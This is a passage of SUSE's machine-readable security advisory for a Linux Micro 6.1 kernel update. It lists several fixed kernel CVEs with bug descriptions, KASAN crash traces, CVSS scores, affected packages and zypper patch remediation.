"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53743"
},
{
"cve": "CVE-2023-53750",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53750"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: freescale: Fix a memory out of bounds when num_configs is 1\n\nThe config passed in by pad wakeup is 1, when num_configs is 1,\nConfiguration [1] should not be fetched, which will be detected\nby KASAN as a memory out of bounds condition. Modify to get\nconfigs[1] when num_configs is 2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53750",
"url": "https://www.suse.com/security/cve/CVE-2023-53750"
},
{
"category": "external",
"summary": "SUSE Bug 1254611 for CVE-2023-53750",
"url": "https://bugzilla.suse.com/1254611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53750"
},
{
"cve": "CVE-2023-53752",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53752"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: deal with integer overflows in kmalloc_reserve()\n\nBlamed commit changed:\n ptr = kmalloc(size);\n if (ptr)\n size = ksize(ptr);\n\n size = kmalloc_size_roundup(size);\n ptr = kmalloc(size);\n\nThis allowed various crash as reported by syzbot [1]\nand Kyle Zeng.\n\nProblem is that if @size is bigger than 0x80000001,\nkmalloc_size_roundup(size) returns 2^32.\n\nkmalloc_reserve() uses a 32bit variable (obj_size),\nso 2^32 is truncated to 0.\n\nkmalloc(0) returns ZERO_SIZE_PTR which is not handled by\nskb allocations.\n\nFollowing trace can be triggered if a netdev-\u003emtu is set\nclose to 0x7fffffff\n\nWe might in the future limit netdev-\u003emtu to more sensible\nlimit (like KMALLOC_MAX_SIZE).\n\nThis patch is based on a syzbot report, and also a report\nand tentative fix from Kyle Zeng.\n\n[1]\nBUG: KASAN: user-memory-access in __build_skb_around net/core/skbuff.c:294 [inline]\nBUG: KASAN: user-memory-access in __alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527\nWrite of size 32 at addr 00000000fffffd10 by task syz-executor.4/22554\n\nCPU: 1 PID: 22554 Comm: syz-executor.4 Not tainted 6.1.39-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023\nCall trace:\ndump_backtrace+0x1c8/0x1f4 arch/arm64/kernel/stacktrace.c:279\nshow_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:286\n__dump_stack lib/dump_stack.c:88 [inline]\ndump_stack_lvl+0x120/0x1a0 lib/dump_stack.c:106\nprint_report+0xe4/0x4b4 mm/kasan/report.c:398\nkasan_report+0x150/0x1ac mm/kasan/report.c:495\nkasan_check_range+0x264/0x2a4 mm/kasan/generic.c:189\nmemset+0x40/0x70 mm/kasan/shadow.c:44\n__build_skb_around net/core/skbuff.c:294 [inline]\n__alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527\nalloc_skb include/linux/skbuff.h:1316 [inline]\nigmpv3_newpack+0x104/0x1088 net/ipv4/igmp.c:359\nadd_grec+0x81c/0x1124 net/ipv4/igmp.c:534\nigmpv3_send_cr net/ipv4/igmp.c:667 [inline]\nigmp_ifc_timer_expire+0x1b0/0x1008 net/ipv4/igmp.c:810\ncall_timer_fn+0x1c0/0x9f0 kernel/time/timer.c:1474\nexpire_timers kernel/time/timer.c:1519 [inline]\n__run_timers+0x54c/0x710 kernel/time/timer.c:1790\nrun_timer_softirq+0x28/0x4c kernel/time/timer.c:1803\n_stext+0x380/0xfbc\n____do_softirq+0x14/0x20 arch/arm64/kernel/irq.c:79\ncall_on_irq_stack+0x24/0x4c arch/arm64/kernel/entry.S:891\ndo_softirq_own_stack+0x20/0x2c arch/arm64/kernel/irq.c:84\ninvoke_softirq kernel/softirq.c:437 [inline]\n__irq_exit_rcu+0x1c0/0x4cc kernel/softirq.c:683\nirq_exit_rcu+0x14/0x78 kernel/softirq.c:695\nel0_interrupt+0x7c/0x2e0 arch/arm64/kernel/entry-common.c:717\n__el0_irq_handler_common+0x18/0x24 arch/arm64/kernel/entry-common.c:724\nel0t_64_irq_handler+0x10/0x1c arch/arm64/kernel/entry-common.c:729\nel0t_64_irq+0x1a0/0x1a4 arch/arm64/kernel/entry.S:584",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53752",
"url": "https://www.suse.com/security/cve/CVE-2023-53752"
},
{
"category": "external",
"summary": "SUSE Bug 1254613 for CVE-2023-53752",
"url": "https://bugzilla.suse.com/1254613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53752"
},
{
"cve": "CVE-2023-53759",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53759"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: hidraw: fix data race on device refcount\n\nThe hidraw_open() function increments the hidraw device reference\ncounter. The counter has no dedicated synchronization mechanism,\nresulting in a potential data race when concurrently opening a device.\n\nThe race is a regression introduced by commit 8590222e4b02 (\"HID:\nhidraw: Replace hidraw device table mutex with a rwsem\"). While\nminors_rwsem is intended to protect the hidraw_table itself, by instead\nacquiring the lock for writing, the reference counter is also protected.\nThis is symmetrical to hidraw_release().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53759",
"url": "https://www.suse.com/security/cve/CVE-2023-53759"
},
{
"category": "external",
"summary": "SUSE Bug 1254663 for CVE-2023-53759",
"url": "https://bugzilla.suse.com/1254663"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53759"
},
{
"cve": "CVE-2023-53762",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53762"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Fix UAF in hci_disconnect_all_sync\n\nUse-after-free can occur in hci_disconnect_all_sync if a connection is\ndeleted by concurrent processing of a controller event.\n\nTo prevent this the code now tries to iterate over the list backwards\nto ensure the links are cleanup before its parents, also it no longer\nrelies on a cursor, instead it always uses the last element since\nhci_abort_conn_sync is guaranteed to call hci_conn_del.\n\nUAF crash log:\n==================================================================\nBUG: KASAN: slab-use-after-free in hci_set_powered_sync\n(net/bluetooth/hci_sync.c:5424) [bluetooth]\nRead of size 8 at addr ffff888009d9c000 by task kworker/u9:0/124\n\nCPU: 0 PID: 124 Comm: kworker/u9:0 Tainted: G W\n6.5.0-rc1+ #10\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n1.16.2-1.fc38 04/01/2014\nWorkqueue: hci0 hci_cmd_sync_work [bluetooth]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x5b/0x90\n print_report+0xcf/0x670\n ? __virt_addr_valid+0xdd/0x160\n ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n kasan_report+0xa6/0xe0\n ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n ? __pfx_set_powered_sync+0x10/0x10 [bluetooth]\n hci_set_powered_sync+0x2c9/0x4a0 [bluetooth]\n ? __pfx_hci_set_powered_sync+0x10/0x10 [bluetooth]\n ? __pfx_lock_release+0x10/0x10\n ? __pfx_set_powered_sync+0x10/0x10 [bluetooth]\n hci_cmd_sync_work+0x137/0x220 [bluetooth]\n process_one_work+0x526/0x9d0\n ? __pfx_process_one_work+0x10/0x10\n ? __pfx_do_raw_spin_lock+0x10/0x10\n ? mark_held_locks+0x1a/0x90\n worker_thread+0x92/0x630\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x196/0x1e0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x2c/0x50\n \u003c/TASK\u003e\n\nAllocated by task 1782:\n kasan_save_stack+0x33/0x60\n kasan_set_track+0x25/0x30\n __kasan_kmalloc+0x8f/0xa0\n hci_conn_add+0xa5/0xa80 [bluetooth]\n hci_bind_cis+0x881/0x9b0 [bluetooth]\n iso_connect_cis+0x121/0x520 [bluetooth]\n iso_sock_connect+0x3f6/0x790 [bluetooth]\n __sys_connect+0x109/0x130\n __x64_sys_connect+0x40/0x50\n do_syscall_64+0x60/0x90\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFreed by task 695:\n kasan_save_stack+0x33/0x60\n kasan_set_track+0x25/0x30\n kasan_save_free_info+0x2b/0x50\n __kasan_slab_free+0x10a/0x180\n __kmem_cache_free+0x14d/0x2e0\n device_release+0x5d/0xf0\n kobject_put+0xdf/0x270\n hci_disconn_complete_evt+0x274/0x3a0 [bluetooth]\n hci_event_packet+0x579/0x7e0 [bluetooth]\n hci_rx_work+0x287/0xaa0 [bluetooth]\n process_one_work+0x526/0x9d0\n worker_thread+0x92/0x630\n kthread+0x196/0x1e0\n ret_from_fork+0x2c/0x50\n==================================================================",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53762",
"url": "https://www.suse.com/security/cve/CVE-2023-53762"
},
{
"category": "external",
"summary": "SUSE Bug 1254606 for CVE-2023-53762",
"url": "https://bugzilla.suse.com/1254606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
